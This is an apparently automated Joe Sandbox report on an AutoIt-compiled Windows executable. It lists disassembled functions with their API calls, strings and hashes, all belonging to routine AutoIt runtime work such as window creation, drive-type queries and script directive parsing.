API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8a970c0f918ce1c530399d6538d0bfcac19cf88ee8c2fb32a53936efd189f1d3
Instruction ID: 99b98d17fea351cf5e1c807dc8047e2da2e07e07b78008fa9932c532ba434734
Opcode Fuzzy Hash: 8a970c0f918ce1c530399d6538d0bfcac19cf88ee8c2fb32a53936efd189f1d3
Instruction Fuzzy Hash: 97129F30600202EFDB55CF24C898BAABBE6FF45324F544569F855EB2A2C731EC52CB91

Function 006774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0067759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00677633
GetClientRect.USER32(00000000,?), ref: 0067763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00677683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00677692
GetStockObject.GDI32(00000011), ref: 006776A2
SelectObject.GDI32(00000000,00000000), ref: 006776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006776BF
DeleteDC.GDI32(00000000), ref: 006776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0067770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00677746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0067775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0067776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0067779B
GetStockObject.GDI32(00000011), ref: 006777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006777BB

Strings

static, xrefs: 0067767D, 00677795
AutoIt v3, xrefs: 0067762B
DISPLAY, xrefs: 00677688
msctls_progress32, xrefs: 0067773C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 50e3648644182194b8cb4bb2b3759e76bca7059f0a5bdbbb8caffad3d8a2cd09
Instruction ID: dc02eec89f9f0c9e2199d4129778b27aa30d81acbf871d0f8c4663ecd1172e2a
Opcode Fuzzy Hash: 50e3648644182194b8cb4bb2b3759e76bca7059f0a5bdbbb8caffad3d8a2cd09
Instruction Fuzzy Hash: A2A140B1A40615BFEB14DBA4DC4AFAF7BBAEB04710F108214FA15A72E1D774AD40CB64

Function 0066AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066AD1E
GetDriveTypeW.KERNEL32(?,0068FAC0,?,\\.\,0068F910), ref: 0066ADFB
SetErrorMode.KERNEL32(00000000,0068FAC0,?,\\.\,0068F910), ref: 0066AF59

Strings

MMC, xrefs: 0066AF1A
PhysicalDrive, xrefs: 0066ADA7
RAID, xrefs: 0066AEF7
1394, xrefs: 0066AEDB
Unknown, xrefs: 0066AE1B, 0066AEBF
ATA, xrefs: 0066AED4
SAS, xrefs: 0066AF05
\\.\, xrefs: 0066AD70
Fixed, xrefs: 0066AE43
SATA, xrefs: 0066AF0C
SSA, xrefs: 0066AEE2
iSCSI, xrefs: 0066AEFE
USB, xrefs: 0066AEF0
ATAPI, xrefs: 0066AECD
SSD, xrefs: 0066AE86
SCSI, xrefs: 0066AEC6
Virtual, xrefs: 0066AF21
FileBackedVirtual, xrefs: 0066AF28
RAMDisk, xrefs: 0066AE25
Fibre, xrefs: 0066AEE9
CDROM, xrefs: 0066AE2F
Removable, xrefs: 0066AE4D
Network, xrefs: 0066AE39

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f81ec66fa7015f014a9caf0f87d02b628802bccd6b4abaffea2abef66942376c
Instruction ID: 60010d8feebb0db27826bd91edc3dde224da05629296027f5b15fcdfd552ea0d
Opcode Fuzzy Hash: f81ec66fa7015f014a9caf0f87d02b628802bccd6b4abaffea2abef66942376c
Instruction Fuzzy Hash: FE514FF0644245AFCB54EFE0C992CFAB3A7EF48700B21445AE406B7291DA719D82EF53

Function 006068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00606931
__wcsnicmp.LIBCMT ref: 00606949
__wcsnicmp.LIBCMT ref: 00606961
__wcsnicmp.LIBCMT ref: 00606979
__wcsnicmp.LIBCMT ref: 00606991
__wcsnicmp.LIBCMT ref: 006069A9
__wcsnicmp.LIBCMT ref: 006069C1
__wcsnicmp.LIBCMT ref: 006069D5
__wcsnicmp.LIBCMT ref: 00606A16
__wcsnicmp.LIBCMT ref: 00606A2A
__wcsnicmp.LIBCMT ref: 00606A3E
__wcsnicmp.LIBCMT ref: 00606A52

Strings

#cs, xrefs: 006069CF, 00606A24
Cannot parse #include, xrefs: 0063E3F0
#include, xrefs: 006069A3
#comments-end, xrefs: 00606A38
Bad directive syntax error, xrefs: 0063E31A
#include-once, xrefs: 0060698B
#OnAutoItStartRegister, xrefs: 00606973
#notrayicon, xrefs: 00606943
Unterminated group of comments, xrefs: 0063E403
#comments-start, xrefs: 006069BB, 00606A10
#ce, xrefs: 00606A4C
#requireadmin, xrefs: 0060695B
#pragma compile, xrefs: 0060692B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: a9a0ebf112c752f07e1e8d74e51c30d982901524aefa1bfe3d30941999bd40fb
Instruction ID: cc2c4f7c1ab5fc6fab49ea68df882a457e8073c39411315c2ce75d9e7c40682e
Opcode Fuzzy Hash: a9a0ebf112c752f07e1e8d74e51c30d982901524aefa1bfe3d30941999bd40fb
Instruction Fuzzy Hash: 8D8129B06802167ADF14BB60EC42FEB376BAF14700F044028F901AB6D6EB71DE55C6A9

Function 00689A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00689AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00689B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00689BA7

Strings

0, xrefs: 00689BE4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 94fb89c0af9df527537be7d79725b09d6e8af16dfa857ef93191e58286620e27
Instruction ID: 99e96bf1513d161cefb1d93284d1803c4cdf9c366e80b6b88e8d9e9dd49f0bf2
Opcode Fuzzy Hash: 94fb89c0af9df527537be7d79725b09d6e8af16dfa857ef93191e58286620e27
Instruction Fuzzy Hash: 7F02BC30104201AFE729EF24C849BBABBE6FF49314F08872DF995962A1D775D944CB62

Function 0068A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0068A903
SetTextColor.GDI32(?,?), ref: 0068A907
GetSysColorBrush.USER32(0000000F), ref: 0068A91D
GetSysColor.USER32(0000000F), ref: 0068A928
CreateSolidBrush.GDI32(?), ref: 0068A92D
GetSysColor.USER32(00000011), ref: 0068A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068A953
SelectObject.GDI32(?,00000000), ref: 0068A964
SetBkColor.GDI32(?,00000000), ref: 0068A96D
SelectObject.GDI32(?,?), ref: 0068A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0068A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0068A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0068AA32
DrawFocusRect.USER32(?,?), ref: 0068AA3D
GetSysColor.USER32(00000011), ref: 0068AA4B
SetTextColor.GDI32(?,00000000), ref: 0068AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068AA67
SelectObject.GDI32(?,0068A5FA), ref: 0068AA7E
DeleteObject.GDI32(?), ref: 0068AA89
SelectObject.GDI32(?,?), ref: 0068AA8F
DeleteObject.GDI32(?), ref: 0068AA94
SetTextColor.GDI32(?,?), ref: 0068AA9A
SetBkColor.GDI32(?,?), ref: 0068AAA4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c6d908a01e3747eeaba4e5043acff2c21f0e3d1fd82a50104253e9fbf5d88ce0
Instruction ID: a15d624d4e242d79dbb22b4b72ca9b35a5ebc09e5cdfca73fdb135f8fc9226ee
Opcode Fuzzy Hash: c6d908a01e3747eeaba4e5043acff2c21f0e3d1fd82a50104253e9fbf5d88ce0
Instruction Fuzzy Hash: 0D512E71901208FFDF119FA4DC48EAE7B7AEF08320F215626F915AB2A1D7759940DF90

Function 006889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00688AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688AD2
CharNextW.USER32(0000014E), ref: 00688B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00688B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00688B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00688B86
SetWindowTextW.USER32(?,0000014E), ref: 00688BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00688BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00688C1F
_memset.LIBCMT ref: 00688C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00688C8D
_memset.LIBCMT ref: 00688CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00688D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00688D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00688E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00688E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00688E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00688EB4
DrawMenuBar.USER32(?), ref: 00688EC3
SetWindowTextW.USER32(?,0000014E), ref: 00688EEB

Strings

0, xrefs: 00688E55

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 2ee987e1f2e379a7512bfcedac59d97202c206d6a71d58944011701d08e83784
Instruction ID: 97434da405ec1ff6505269592c3c5fc121d7e85014f63bd2579a6d91be1da973
Opcode Fuzzy Hash: 2ee987e1f2e379a7512bfcedac59d97202c206d6a71d58944011701d08e83784
Instruction Fuzzy Hash: FAE18274900219AFDF20EF54CC84EEE7BBAEF05750F50825AFA15AB291DB709981DF60

Function 0068488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006849CA
GetDesktopWindow.USER32 ref: 006849DF
GetWindowRect.USER32(00000000), ref: 006849E6
GetWindowLongW.USER32(?,000000F0), ref: 00684A48
DestroyWindow.USER32(?), ref: 00684A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00684A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00684ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00684AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00684AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00684B09
IsWindowVisible.USER32(?), ref: 00684B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00684B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00684B58
GetWindowRect.USER32(?,?), ref: 00684B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00684B96
GetMonitorInfoW.USER32(00000000,?), ref: 00684BB0
CopyRect.USER32(?,?), ref: 00684BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00684C32

Strings

0, xrefs: 00684975
tooltips_class32, xrefs: 00684A96
(, xrefs: 00684BA3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c9f61c07b298968e9f32894274f4327b00aae18a12d70f79845a4cdb0ed3fd4c
Instruction ID: df8cfaa53674fc2908b8ef9cf601b5577a4dd4b3b0d71026de712339bbde82d1
Opcode Fuzzy Hash: c9f61c07b298968e9f32894274f4327b00aae18a12d70f79845a4cdb0ed3fd4c
Instruction Fuzzy Hash: 16B17B71604341AFDB48EF64C844B6BBBE6BF88314F008A1CF5999B2A1DB71EC05CB55

Function 0066449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006644D2
_wcscpy.LIBCMT ref: 00664500
_wcscmp.LIBCMT ref: 0066450B
_wcscat.LIBCMT ref: 00664521
_wcsstr.LIBCMT ref: 0066452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00664548
_wcscat.LIBCMT ref: 00664591
_wcscat.LIBCMT ref: 00664598
_wcsncpy.LIBCMT ref: 006645C3

Strings

04090000, xrefs: 0066457E
\VarFileInfo\Translation, xrefs: 00664540
%u.%u.%u.%u, xrefs: 00664626
StringFileInfo\, xrefs: 0066451B
DefaultLangCodepage, xrefs: 006645AB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 9c2576c468a6eda7ad5358d06a0b44dba5264f063a8b7b4e98127bd8809fb565
Instruction ID: 2b9397b53d56eda20e5b7198d937a34e64a7e5c5fac95dfe3af5455e50f36759
Opcode Fuzzy Hash: 9c2576c468a6eda7ad5358d06a0b44dba5264f063a8b7b4e98127bd8809fb565
Instruction Fuzzy Hash: 4E41D3719002217BEB54BB74EC43EFF77AEDF41710F04056AF905E6282EE349A419BA9

Function 006027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028BC
GetSystemMetrics.USER32(00000007), ref: 006028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028EF
GetSystemMetrics.USER32(00000008), ref: 006028F7
GetSystemMetrics.USER32(00000004), ref: 0060291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00602939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00602949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0060297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00602990
GetClientRect.USER32(00000000,000000FF), ref: 006029AE
GetStockObject.GDI32(00000011), ref: 006029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 006029D5

Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
Part of subcall function 00602344: ScreenToClient.USER32(006C57B0,?), ref: 00602374
Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7

SetTimer.USER32(00000000,00000000,00000028,00601256), ref: 006029FC

Strings

AutoIt v3 GUI, xrefs: 00602974

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b0ead6b822bc87ae4837669a9fa32ca963f73ad918f8241fe5214c47fe89eb69
Instruction ID: 8f0f913e7e4d74ea8c406a89237b89b3a3cd14551f8626f985c07b9e4b8fe576
Opcode Fuzzy Hash: b0ead6b822bc87ae4837669a9fa32ca963f73ad918f8241fe5214c47fe89eb69
Instruction Fuzzy Hash: 90B15F7564020AEFDB18DF68DC59BAE7BB6FF08314F104229FA16A62D0DB74E851CB50

Function 0065A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0065A47A
__swprintf.LIBCMT ref: 0065A51B
_wcscmp.LIBCMT ref: 0065A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065A583
_wcscmp.LIBCMT ref: 0065A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0065A5F6
GetDlgCtrlID.USER32(?), ref: 0065A648
GetWindowRect.USER32(?,?), ref: 0065A67E
GetParent.USER32(?), ref: 0065A69C
ScreenToClient.USER32(00000000), ref: 0065A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0065A71D
_wcscmp.LIBCMT ref: 0065A731
GetWindowTextW.USER32(?,?,00000400), ref: 0065A757
_wcscmp.LIBCMT ref: 0065A76B

Part of subcall function 0062362C: _iswctype.LIBCMT ref: 00623634

Strings

%s%u, xrefs: 0065A515

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 0a39c019bb888f0060133cdf59fcc9be9346be184de7871d74c7f3bc591aeabd
Instruction ID: 1475735d3921c3ac943fadb06a0f7ea52b53dddd9fe7aa6e5869dbf32fdf4249
Opcode Fuzzy Hash: 0a39c019bb888f0060133cdf59fcc9be9346be184de7871d74c7f3bc591aeabd
Instruction Fuzzy Hash: 9AA1B131204616AFD714DFA0C884BEAB7EAFF48316F044729FD99D2250DB30E959CB92

Function 0065AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0065AF18
_wcscmp.LIBCMT ref: 0065AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0065AF51
CharUpperBuffW.USER32(?,00000000), ref: 0065AF6E
_wcscmp.LIBCMT ref: 0065AF8C
_wcsstr.LIBCMT ref: 0065AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0065AFD5
_wcscmp.LIBCMT ref: 0065AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0065B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0065B055
_wcscmp.LIBCMT ref: 0065B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0065B08D
GetWindowRect.USER32(00000004,?), ref: 0065B0F6

Strings

@, xrefs: 0065AEF9
ThumbnailClass, xrefs: 0065AFE0, 0065B060

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 78fbf04e8414e36da64765f27f89a6e55375fe0c904729bb15bcf3251bcda7c0
Instruction ID: 83a7b27d0c10adc5eec308ad28096ed2ef97d8148ec1a97f19482f6967e1657a
Opcode Fuzzy Hash: 78fbf04e8414e36da64765f27f89a6e55375fe0c904729bb15bcf3251bcda7c0
Instruction Fuzzy Hash: 6F81C1711082059FDB14DF10C881FAAB7EAEF44316F14956EFD858A291DB34DD89CBA1

Function 0068C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

DragQueryPoint.SHELL32(?,?), ref: 0068C627

Part of subcall function 0068AB37: ClientToScreen.USER32(?,?), ref: 0068AB60
Part of subcall function 0068AB37: GetWindowRect.USER32(?,?), ref: 0068ABD6
